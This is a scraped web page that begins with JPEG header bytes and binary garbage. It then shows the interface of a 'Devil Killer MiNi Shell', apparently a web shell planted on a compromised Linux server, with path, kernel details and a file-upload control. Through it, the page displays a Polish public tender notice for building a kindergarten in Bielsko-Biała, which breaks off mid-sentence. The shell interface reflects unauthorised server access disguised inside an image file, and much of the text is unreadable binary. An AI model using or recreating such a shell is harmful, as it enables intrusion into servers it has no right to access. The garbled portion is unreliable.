JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211117/0027185303-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> BUDOWA PRZEDSZKOLA PRZY UL. JANOWICKIEJ I UL. JAKUBA JASIŃSKIEGO W BIELSKU-BIAŁEJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Bielsko-Biała Urząd Miejski w Bielsku-Białej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072181741</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.bielsko-biala.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.um.bielsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> BUDOWA PRZEDSZKOLA PRZY UL. JANOWICKIEJ I UL. JAKUBA JASIŃSKIEGO W BIELSKU-BIAŁEJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c58f3d36-4774-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00271853</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000766/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa przedszkola przy ul. Janowickiej i ulicy Jakuba Jasińskiego w Bielsku-Białej wraz z przebudową skrzyżowania tych ulic</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c58f3d36-4774-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umbielsko.logintrade.net/rejestracja/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywasię przy użyciu Platformy do elektronicznej obsługi zamówień (zwanej dalej: „Platformą”) dostępnej podadresem: www.um-bielsko.logintrade.net/rejestracja/ oraz poczty elektronicznej zp@um.bielsko.pl lub m.wanat@um.bielsko.pl2. Osobą uprawnioną do komunikowania się z Wykonawcami jest: MateuszWanat – Inspektor w Wydziale Zamówień Publicznych (tel. 33 4971 855, adres e-mail:m.wanat@um.bielsko.pl 3. Wykonawca zamierzający wziąć udział w postępowaniu o udzieleniezamówienia publicznego, musi posiadać konto na Platformie. Wykonawca posiadający konto naPlatformie ma możliwość złożenia, wycofania oferty oraz składania wniosków o wyjaśnienie treściSWZ. 4. Wymagania techniczne i organizacyjne wysyłania i odbierania przekazania przedmiotowychśrodków dowodowych, podmiotowych środków dowodowych oraz innych oświadczeń i dokumentówprzy ich użyciu zostały opisane poniżej:1) Do połączenia używany jest szyfrowany protokół HTTPS.Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufnośćtransmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie ma dostępdo możliwości złożenia, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytańdo treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach. Dopuszczalneprzeglądarki internetowe: Internet Explorer 10 i nowsze, Edge Google Chrome Mozilla FirefoxOperaPozostałe wymagania techniczne: dostęp do sieci internet obsługa przez przeglądarkę protokołuXMLHttpRequest - ajax włączona obsługa JavaScript zalecana szybkość łącza internetowego powyżej500 KB/s zainstalowany Acrobat Reader zainstalowane środowisko uruchomieniowe Java - Java SERuntime Environment 6 Update 24 lub nowszy Maksymalny rozmiar plików przesyłanych zapośrednictwem Platformy wynosi 150 MB.6. Za datę przekazania oferty, oświadczenia, o którym mowaw art. 125 ustawy Pzp, przedmiotowych środków dowodowych, podmiotowych środków dowodowych.Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Robotybudowlane oraz innych oświadczeń i dokumentów przyjmuje się datę ich wpływu na Platformę, a niedatę wykonania danej czynności przez Wykonawcę na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1-3 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) – zwanego dalej „RODO”,<br/>zamawiający jako administrator danych osobowych wypełnia obowiązek informacyjny związany ze<br/>zbieraniem danych osobowych bezpośrednio od osób fizycznych, których dane dotyczą, w celu<br/>związanym z nin. postępowaniem o udzielenie zamówienia publicznego, informując wykonawcę, że: a)<br/>administratorem Pani/Pana danych osobowych jest Miasto Bielsko-Biała reprezentowane przez<br/>Prezydenta Miasta B-B, adres: UM w B-B, pl. Ratuszowy 1, 43-300 B-B, tel. 33 4971 851; b) w Mieście<br/>B-B UM w Bielsku-Białej powołany został inspektor ochrony danych osobowych, dane kontaktowe: tel.<br/>33 4971 721, adres e-mail: iod@um.bielsko.pl;c) Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO, w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego na realizację zadania pn. Budowa przedszkola przy ul. Janowickiej i ul. Jakuba<br/>Jasińskiego, znak sprawy: ZP.271.2.35.2021.MW, d)odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania; e)Pani/Pana dane<br/>osobowe będą przechowywane przez okres dwóch lat od dnia 31 grudnia następującego po złożeniu<br/>zestawienia wydatków Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-<br/>2020 do Komisji Europejskiej, w którym ujęto ostateczne wydatki dotyczące zakończenia projektu (art.<br/>140 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1303/2013 z dnia 17 grudnia 2013 r.),<br/>bez uszczerbku dla zasad regulujących pomoc państwa oraz krajowych przepisów dotyczących<br/>archiwizacji dokumentów; f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym, określonym w przepisach ustawy Pzp, związanym<br/>z udziałem w nin. postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp; g)w odniesieniu do Pani/Pana danych osobowych decyzje<br/>nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO; h) posiada Pani/Pan:<br/>na podstawie art. 15 RODO, prawo dostępu do danych osobowych Pani/Pana dotyczących, Uwaga: W<br/>przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego. W przypadku gdy wykonanie obowiązków, o<br/>których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, zamawiający<br/>może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w<br/>szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia.-na podstawie art. 16 RODO, prawo do sprostowania Pani/Pana danych osobowych,<br/>Uwaga: Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o których mowa w art. 16 RODO, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do<br/>sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może naruszać integralności<br/>protokołu oraz jego załączników. -na podstawie art. 18 RODO, prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>RODO, Uwaga: Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1<br/>RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego.- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących naruszaprzepisy RODO,i) nie przysługuje Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO, prawo do<br/>usunięcia danych osobowych,- prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO,- na podstawie art. 21 RODO, prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.2)<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO, w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w Dziale VI ustawy Pzp, do upływu terminu<br/>do ich wniesienia.3) Zamawiający przetwarza dane osobowe zebrane w nin. postępowaniu o udzielenie<br/>zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.4) Do przetwarzania danych osobowych, o których mowa w art. 10 RODO, mogą<br/>być dopuszczone wyłącznie osoby posiadające pisemne upoważnienie. Osoby dopuszczone do<br/>przetwarzania takich danych są obowiązane do zachowania ich w poufności.5) W przypadku danych<br/>osobowych zamieszczonych przez zamawiającego w Biuletynie Zamówień Publicznych, prawa, o<br/>których mowa w art. 15 i art. 16 RODO, są wykonywane w drodze żądania skierowanego do<br/>zamawiającego.6) Ponadto zamawiający informuje, że zgodnie z art. 13 RODO, w zamówieniach<br/>publicznych administratorem danych osobowych, obowiązanym do spełnienia obowiązku<br/>informacyjnego, jest również w szczególności:a) wykonawca – względem osób fizycznych, od których<br/>dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności:- osoby fizycznej skierowanej do<br/>realizacji zamówienia,- podwykonawcy/ podmiotu trzeciego będącego osobą fizyczną,-<br/>podwykonawcy/podmiotu trzeciego będącego osobą fizyczną, prowadzącą jednoosobową działalność<br/>gospodarczą,- pełnomocnika podwykonawcy/ podmiotu trzeciego będącego osobą fizyczną (np. dane<br/>osobowe zamieszczone w pełnomocnictwie),- członka organu zarządzającego podwykonawcy/<br/>podmiotu trzeciego, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK);<br/>b) podwykonawca/ podmiot trzeci – względem osób fizycznych, od których dane osobowe<br/>bezpośrednio pozyskał – dotyczy to w szczególności osoby fizycznej skierowanej do realizacji<br/>zamówienia.7)<br/>Wykonawca ubiegający się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia<br/>wszystkich obowiązków formalno-prawnych związanych z udziałem w nin. postępowaniu. Do<br/>obowiązków tych należą m.in. obowiązki wynikające z RODO, w szczególności obowiązek<br/>informacyjny, przewidziany w art. 13 RODO, względem osób fizycznych, których dane osobowe<br/>dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny,<br/>wynikający z art. 13 RODO, nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna,<br/>której dane dotyczą, dysponuje już tymi informacjami, zgodnie z art. 13 ust. 4 RODO.8) Ponadto<br/>wykonawca będzie musiał wypełnić obowiązek informacyjny, wynikający z art. 14 RODO, względem<br/>osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że<br/>ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.9) W celu<br/>zapewnienia, że wykonawca wypełnił, określone w ppkt. 7 i 8, obowiązki informacyjne oraz ochrony<br/>prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem<br/>wykonawcy w nin. postępowaniu, zobowiązany jest do złożenia w nin. postępowaniu o udzielenie<br/>zamówienia publicznego oświadczenia o wypełnieniu przez niego obowiązków informacyjnych<br/>przewidzianych w art. 13 lub art. 14 RODO – wg wzoru stanowiącego Załącznik nr 1a do nin. SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.114.2021.MW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na budowie przedszkola przy ul.Janowickiej i ul. Jakuba Jasińskiego w Bielsku-Białej, obejmujące w szczególności:<br/>• roboty przygotowawcze i zabezpieczające;<br/>• roboty rozbiórkowe i demontażowe;<br/>• roboty ziemne;<br/>• wykonanie elementów konstrukcyjnych budynku;<br/>• wykonanie robót żelbetowych, murarskich, izolacyjnych, tynkarskich, okładzinowych,<br/>malarskich, posadzkarskich i wykończeniowych;<br/>• wykonanie robót montażowych stolarki drzwiowej i okiennej;<br/>• dostawę oraz montaż wind;<br/>• roboty w zakresie instalacji sanitarnych (wod.-kan., c.w.u., c.o./c.t., wentylacji, klimatyzacji,<br/>p.poż.);<br/>• roboty w zakresie instalacji elektrycznej, teletechnicznej, słaboprądowej, p.poż, fotowoltaicznej;<br/>• roboty w zakresie wykonania przyłączy do budynków;<br/>• roboty w zakresie wykonania nawierzchni drogowych i chodnikowych;<br/>• roboty w zakresie wykonania oznakowania drogowego poziomego i pionowego;<br/>• uporządkowanie terenu robót najpóźniej w dniu odbioru końcowego (wywóz<br/>i składowanie odpadów m.in. gruzu, złomu, itp.);<br/>• roboty związane z usuwaniem drzew, nasadzeniami zastępczymi oraz pracami ogrodniczymi i<br/>pielęgnacyjnymi zasadzonej zieleni.<br/>Przedmiot zamówienia opisany jest szczegółowo w SWZ i niżej wymienionych załącznikach do<br/>SWZ, tj. :<br/>• dokumentacji projektowej,<br/>• specyfikacjach technicznych wykonania i odbioru robót budowlanych STWiORB,<br/>• wzorze umowy,<br/>• przedmiarach robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45223500-1 - Konstrukcje z betonu zbrojonego</p> <p class="mb-0">45223822-4 - Gotowe części składowe</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wydłużenia okresu udzielenia gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wydłużenia terminu płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - co najmniej jedną (1) robotę budowlaną o wartości robót co najmniej 8 000 000 zł brutto lub dwie (2) roboty budowlane o łącznej wartości co najmniej 8 000 000 zł brutto, w zakresie której była budowa lub<br/>rozbudowa lub przebudowa budynku, w tym co najmniej:<br/>• roboty ogólnobudowlane (w tym: konstrukcyjne, wykończeniowe, dekarskie);<br/>• roboty związane z zagospodarowaniem terenu (w tym: wykonanie chodników, wykonanie<br/>nasadzeń zieleni);<br/>• roboty w zakresie instalacji sanitarnych (w tym: wodno-kanalizacyjne, centralnego ogrzewania);<br/>• roboty w zakresie instalacji elektrycznej;<br/>• wymiana i/lub montaż stolarki okiennej i drzwiowej;<br/>Uwaga: Robotami związanymi z zagospodarowaniem terenu (w tym: wykonanie chodników, wykonanie nasadzeń zieleni) Wykonawca może się wykazać wykonaniem ich jako oddzielnej roboty.<br/>Roboty te winny być wykonane należycie.<br/>2) Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - co najmniej jedną (1) robotę budowlaną, polegającą na 